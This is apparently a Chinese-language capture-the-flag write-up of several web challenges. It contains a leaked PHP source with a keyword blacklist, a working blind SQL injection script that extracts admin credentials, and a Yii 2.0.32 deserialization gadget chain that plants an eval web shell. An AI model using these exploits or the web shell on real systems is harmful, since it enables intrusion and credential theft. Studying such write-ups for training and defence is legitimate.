robots.txt
When I was a child,I also like to read Robots.txt
Here is what you want:1ndexx.php
.1ndexx.php.swp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}
#logo {
margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
|
然后这TM居然是index.php的源码。。。
payload
预期解应该是类似show_source的函数,当时比赛也确实想到了,但是使用show_source(__FILE__)却没有出,就转而使用phpinfo,没想到拼接字符串直接高亮flag.php
image.php存在注入
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
import requests as req
import time
target = "http://eci-2zeir5o8p6vh7tzmqpxt.cloudeci1.ichunqiu.com/image.php?id="
flag = ''
session = req.session()
for j in range(1, 250):
max = 126
min = 32
length = len(flag.strip())
while 1:
mid = (max + min) // 2
# sql = "select database()" # ctf
# sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # images,users
# sql = "select group_concat(column_name) from information_schema.columns where table_name='users'" # username,password
sql = "select group_concat(username,':',password) from users " # admin:b87889146155b52d7d94e
SQL = f"5 OR ASCII(substr(({sql}),{j},1))>{mid}#".replace(" ", "/**/")
res = session.get(url=target+SQL)
time.sleep(0.5)
print(SQL)
if len(res.text) > 0:
if max - 1 == min:
flag += chr(max)
print(flag)
break
min = mid
else:
if max - 1 == min:
flag += chr(min)
print(flag)
break
max = mid
if length == len(flag.strip()):
print(flag)
break
|
登陆后直接file协议读flag。
www.zip源码泄露,很显然这是Yii框架,那考点应该就是gadget链挖掘,从debug信息可知php版本为5.6,框架版本为2.0.32
参考文章https://www.anquanke.com/post/id/217929直接exp一把梭
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
<?php
namespace yii\rest{
class IndexAction {
public $checkAccess;
public $id;
public function __construct()
{
$this->checkAccess="assert";
$this->id="die(file_put_contents('/var/www/html/web/t.php', '<?php eval(\$_POST[cmd])?>'))";
}
}
}
namespace Faker{
use yii\rest\IndexAction;
class Generator{
protected $formatters = array();
public function __construct()
{
$this->formatters['close']=[new IndexAction,"run"];
}
}
}
namespace yii\db {
use Faker\Generator;
class BatchQueryResult
{
private $_dataReader;
public function __construct()
{
$this->_dataReader=new Generator();
}
}
}
namespace {
echo base64_encode(serialize(new yii\db\BatchQueryResult()));
}
|
之后连蚁剑使用bypass disable_function插件执行/readflag获得flag。
贴个链接,以后复现LightCMS全版本后台RCE 0day分析